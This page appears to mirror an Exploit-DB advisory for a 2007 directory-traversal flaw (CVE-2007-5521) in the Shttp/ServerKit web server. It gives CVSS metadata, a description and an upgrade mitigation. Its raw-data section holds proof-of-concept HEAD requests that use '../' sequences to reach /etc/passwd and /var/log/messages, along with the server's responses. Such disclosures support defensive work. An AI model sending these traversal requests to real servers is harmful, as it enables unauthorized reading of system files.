header-logo
Suggest Exploit
vendor:
ServerKit
by:
Unknown
7.5
CVSS
HIGH
Remote Directory Traversal
22
CWE
Product Name: ServerKit
Affected Version From: Versions prior to Shttp0.0.5
Affected Version To: Not applicable
Patch Exists: YES
Related CWE: CVE-2007-5521
CPE: a:shttp:serverkit
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2007

Remote Directory Traversal Vulnerability in Shttp

A remote attacker can exploit this issue by using directory-traversal sequences to retrieve arbitrary files on a victim user's computer.

Mitigation:

Upgrade to Shttp version 0.0.5 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26212/info

Shttp is prone to a remote directory-traversal vulnerability.

A remote attacker can exploit this issue by using directory-traversal sequences to retrieve arbitrary files on a victim user's computer.

Versions prior to Shttp0.0.5 are vulnerable to this issue.

HEAD /../../etc/passwd HTTP/1.0

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:31:30 GMT
Connection: close


HEAD /../../var/log/messages HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT
Connection: close